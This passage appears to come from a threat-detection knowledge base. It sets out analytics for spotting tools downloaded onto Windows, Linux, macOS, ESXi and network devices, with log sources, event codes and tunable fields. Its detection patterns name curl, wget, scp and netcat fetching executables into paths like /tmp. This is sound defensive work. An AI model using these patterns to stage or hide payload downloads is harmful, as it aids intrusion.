Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded).
| Data Component | Name | Channel |
|---|---|---|
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| File Creation (DC0039) | WinEventLog:Sysmon | EventCode=11 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Field | Description |
|---|---|
| ParentProcessName | Tune for known good updaters (e.g., ChromeUpdate, OneDrive) |
| DestinationIPCategory | Allow filtering by internal vs external IP blocks |
| FilePathRegex | Focus on uncommon file drop paths (e.g., C:\Users\Public\) |
Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | auditd:SYSCALL | connect, execve, write |
| File Creation (DC0039) | auditd:SYSCALL | file creation/modification |
| Network Traffic Flow (DC0078) | iptables:LOG | TCP connections |
| Field | Description |
|---|---|
| ToolName | Match on curl, wget, rsync, etc. based on environment |
| DownloadExtension | Tunable filter to limit to suspicious file types (.sh, .bin, .elf) |
Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:endpointsecurity | ES_EVENT_TYPE_NOTIFY_EXEC |
| File Creation (DC0039) | macos:unifiedlog | file write/create |
| Network Connection Creation (DC0082) | macos:unifiedlog | connection open |
| Field | Description |
|---|---|
| DirectoryTargeted | Restrict to high-risk directories like /Users/Shared, /tmp/ |
| ProcessPath | May tune based on custom tooling or MDM activity |
Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | esxi:hostd | command execution |
| File Creation (DC0039) | esxi:vmkernel | file write |
| Field | Description |
|---|---|
| ToolName | Tune for wget, curl, netcat, and scripting languages in use |
| DatastorePath | Filter or prioritize specific paths (e.g., /vmfs/volumes/) |
Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks.
| Data Component | Name | Channel |
|---|---|---|
| Network Traffic Flow (DC0078) | NSM:Flow | connection metadata |
| File Creation (DC0039) | snmp:syslog | firmware write/log event |
| Field | Description |
|---|---|
| PayloadVolumeThreshold | Tune based on expected update size vs anomalous bulk data transfers |
| ProtocolUsed | Flag unexpected protocols like TFTP, FTP, HTTP |